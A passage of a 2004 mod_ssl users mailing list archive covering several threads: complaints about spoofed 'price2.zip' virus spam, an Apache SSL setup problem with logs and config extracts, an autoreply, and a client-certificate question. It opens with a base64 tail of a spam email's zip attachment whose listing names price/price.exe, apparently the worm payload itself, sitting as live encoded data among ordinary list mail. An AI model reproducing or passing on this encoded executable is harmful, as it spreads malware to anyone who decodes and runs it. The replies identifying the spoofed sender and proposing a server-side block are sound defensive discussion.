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

----------ntbpejvubpcbvoxmyetf--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 10 09:36:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3390CA897A; Tue, 10 Aug 2004 09:36:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 84A5AA8938
	for ; Tue, 10 Aug 2004 09:36:37 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id i7A7aVa0019848
	for ; Tue, 10 Aug 2004 09:36:31 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i7A7aUuB009432
	for ; Tue, 10 Aug 2004 09:36:30 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: Possible virus infected user
Date: Tue, 10 Aug 2004 09:36:30 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Possible virus infected user
Importance: normal
thread-index: AcR+QaTepSpKEqtbTUu5gFFG4kbH3gAai1gA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> ----- Original Message -----=20
> From: "Don Woodward"
> To: 
> Cc: 
> Sent: Monday, August 09, 2004 14:44
> Subject: Possible virus infected user
>=20
>=20
> Modssl list owner and rse@engelschall.com:
>=20
> Please check rse@engelschall.com - I have received several=20
> dozen e-mail's
> via the list from this address - each has a "price2.zip" file=20
> attached and
> the body says "new price" - I believe this person's computer=20
> has a virus and
> they don't know it.

"rse" is actually Ralf S. Engelschall - the guru who wrote mod_ssl in
the first place! However, it's not him sending the mails. The mails are
viral spam and if you look into the header, you'll see that they are
sent to the list-server from:

Received: from office.net (c-24-20-135-99.client.comcast.net
[24.20.135.99])
	by master.modssl.org (Postfix) with SMTP id 2EBC0A8CD1
	for ; Mon,  9 Aug 2004 18:35:50 +0200
(CEST)

What it looks like is that this machine is spoofing the "MAIL From:"
field in SMTP when it sends to the list-server (master.modssl.org). To
block these, the list-server has to implement a rule whereby it does not
accept mail on an external interface which is apparently-from an
internal server.=20

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20



>=20
> Thanks,
>=20
>=20
> Don Woodward
>=20
>=20
>=20
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender=92s company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender=92s company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 18 02:41:34 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B15AAA8960; Wed, 18 Aug 2004 02:41:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from server2.shellworld.net (ip15.shellworld.net [64.49.204.174])
	by master.modssl.org (Postfix) with ESMTP id D50C4A893B
	for ; Wed, 18 Aug 2004 02:41:33 +0200 (CEST)
Received: from server2.shellworld.net (ldavis@localhost [127.0.0.1])
	by server2.shellworld.net (8.12.10/8.12.8) with ESMTP id i7I0fRpo090776
	for ; Wed, 18 Aug 2004 00:41:27 GMT
	(envelope-from ssl@ld.tacticus.com)
Received: from localhost (ldavis@localhost)
	by server2.shellworld.net (8.12.10/8.12.8/Submit) with ESMTP id i7I0fRHa090773
	for ; Tue, 17 Aug 2004 19:41:27 -0500 (CDT)
X-Authentication-Warning: server2.shellworld.net: ldavis owned process doing -bs
Date: Tue, 17 Aug 2004 19:41:27 -0500 (CDT)
From: ssl@ld.tacticus.com
To: modssl-users@modssl.org
Subject: SSL not available, for no apparent reason
Message-ID: 
Organization: "Tacticus Communications, Inc."
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ssl@ld.tacticus.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Good Day:

I am running Debian stable, with the included packages.
Apache version 1.3.26; mod-ssl version 2.8.9-2.4.

I am using a self-signed certificate for now, until testing proves successful.

If I use openssl, with the s_client and s_server options, I can make a 
successful connection through the local host.

However, apache, while it serves on port 80, does not appear to be serving SSL 
documents.

Here are the contents of a couple files:

== ssl.log ==
[17/Aug/2004 06:25:02 28275] [info]  Init: 10nd restart round (already 
detached)
[17/Aug/2004 06:25:02 28275] [info]  Init: Reinitializing OpenSSL library
[17/Aug/2004 06:25:02 28275] [info]  Init: Seeding PRNG with 23689 bytes of 
entropy
[17/Aug/2004 06:25:02 28275] [info]  Init: Configuring temporary RSA private 
keys (512/1024 bits)
[17/Aug/2004 06:25:02 28275] [info]  Init: Configuring temporary DH parameters 
(512/1024 bits)
[17/Aug/2004 06:25:02 28275] [info]  Init: Initializing (virtual) servers for 
SSL
[17/Aug/2004 06:25:02 28275] [info]  Init: Configuring server 
www.placeholder.com:443 for SSL protocol
[17/Aug/2004 06:25:02 28275] [warn]  Init: (www.placeholder.com:443) RSA server 
certificate is a CA certificate (BasicConstraints: CA == TRUE !?)

== httpd.conf extracts ==
[.]
Timeout 300
KeepAlive On
MaxKeepAliveRequests 100
KeepAliveTimeout 15
MinSpareServers 5
MaxSpareServers 10
StartServers 5
MaxClients 150
MaxRequestsPerChild 100

  listen 80
  listen 443

[.]
LoadModule unique_id_module /usr/lib/apache/1.3/mod_unique_id.so
LoadModule setenvif_module /usr/lib/apache/1.3/mod_setenvif.so
LoadModule jk_module /usr/lib/apache/1.3/mod_jk.so
LoadModule php4_module /usr/lib/apache/1.3/libphp4.so
LoadModule ssl_module /usr/lib/apache/1.3/mod_ssl.so
ExtendedStatus On
Port 80
User www-data
Group www-data
ServerAdmin webmaster@placeholder.com
ServerName www.placeholder.com
[.]
ServerSignature On
[.]


AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl


SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  300
SSLMutex  file:/var/run/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLRandomSeed startup file:/dev/urandom 512
SSLRandomSeed connect file:/dev/urandom 512
SSLLog      /var/log/apache/ssl.log
SSLLogLevel info

Include /etc/phpmyadmin/apache.conf
Include /etc/horde/apache.conf
port 80
ServerName atlas.placeholder.com
NameVirtualHost *

DocumentRoot /usr/share/horde/imp
ServerName webmail.placeholder.com
ServerAlias *.webmail.placeholder.com


servername www.placeholder.com
documentroot /var/www/placeholder.com-ssl

sslengine on
sslcertificatefile /etc/apache/placeholder.com.crt
sslcertificatekeyfile /etc/apache/placeholder.com.key
setenvif User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown



DocumentRoot /var/www/placeholder.com
ServerName placeholder.com
ServerAlias *.placeholder.com


I'm not sure what else to examine here, or what I might have screwed up.

Luke
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 18 02:44:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F1C55A8CD0; Wed, 18 Aug 2004 02:44:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alpha2.AXP.MDX.AC.UK (alpha2.axp.mdx.ac.uk [158.94.0.14])
	by master.modssl.org (Postfix) with ESMTP id 7D6DEA8978
	for ; Wed, 18 Aug 2004 02:44:42 +0200 (CEST)
Date: Wed, 18 Aug 2004 01:40:26 +0000
From: a.moon@mdx.ac.uk
Subject: SSL not available, for no apparent reason
To: modssl-users@modssl.org
Message-id: <110598947B9@mdx-bg-staff1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.20
X-Autoreply-From: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry I am away on annual leave.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return on the 31st August 2004.

If this is regarding Global Campus Authorship please send to /contact Kirsteen (k.Macdonald@mdx.ac.uk)


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 20 01:37:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DFCB8A8963; Fri, 20 Aug 2004 01:37:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from qworks.ca (S01060007e97748c4.vn.shawcable.net [24.86.2.57])
	by master.modssl.org (Postfix) with ESMTP id EF22FA893D
	for ; Fri, 20 Aug 2004 01:37:15 +0200 (CEST)
Received: from Katapult (Katapult.qworks.ca [192.168.72.179])
	by qworks.ca (Postfix) with ESMTP id 08B9C8402
	for ; Thu, 19 Aug 2004 16:37:09 -0700 (PDT)
From: "Alex Milanovic" 
To: 
Subject: server verification of client FQDNs
Date: Thu, 19 Aug 2004 16:37:03 -0700
Organization: Sutus
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0024_01C4860A.C1BAB450"
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
Thread-Index: AcSGRWrznOJnUrspTCCKKdQoqMrjgw==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
Message-Id: <20040819233709.08B9C8402@qworks.ca>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Milanovic" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0024_01C4860A.C1BAB450
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hi All,

 

I want to configure Apache to verify client certificates. What I am not sure
about is whether Apache verifies the fully qualified domain name (FQDN) of
each client as well. If it does, where is this behavior explained? For
example, does it use the client IP address to look up the corresponding
domain names in the DNS and then compare all matching domain names to the
one in the client certificate? Also, which field is used in the client
certificate, subjectName.commonName or subjectAltName.dNSName? What happens
if the names don't match? What if the DNS lookup fails because there is no
DNS entry for the given IP?

 

Thanks,

Alex


------=_NextPart_000_0024_01C4860A.C1BAB450
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi All,



 



I want to configure Apache to verify client =
certificates.
What I am not sure about is whether Apache verifies the fully qualified =
domain
name (FQDN) of each client as well. If it does, where is this behavior
explained? For example, does it use the client IP address to look up the =
corresponding
domain names in the DNS and then compare all matching domain names to =
the one
in the client certificate? Also, which field is used in the client =
certificate,
subjectName.commonName or subjectAltName.dNSName? What happens if the =
names don’t
match? What if the DNS lookup fails because there is no DNS entry for =
the given
IP?



 



Thanks,



Alex









------=_NextPart_000_0024_01C4860A.C1BAB450--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 24 17:04:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2635AA895E; Tue, 24 Aug 2004 17:04:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smash.org (eurasia.tambov.ru [195.19.106.10])
	by master.modssl.org (Postfix) with SMTP id EC1FCA893A
	for ; Tue, 24 Aug 2004 17:04:33 +0200 (CEST)
Date: Tue, 24 Aug 2004 18:23:30 -0800
To: modssl-users@modssl.org
Subject: Re: Yahoo!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 26 09:13:46 2004
Return-Path: 
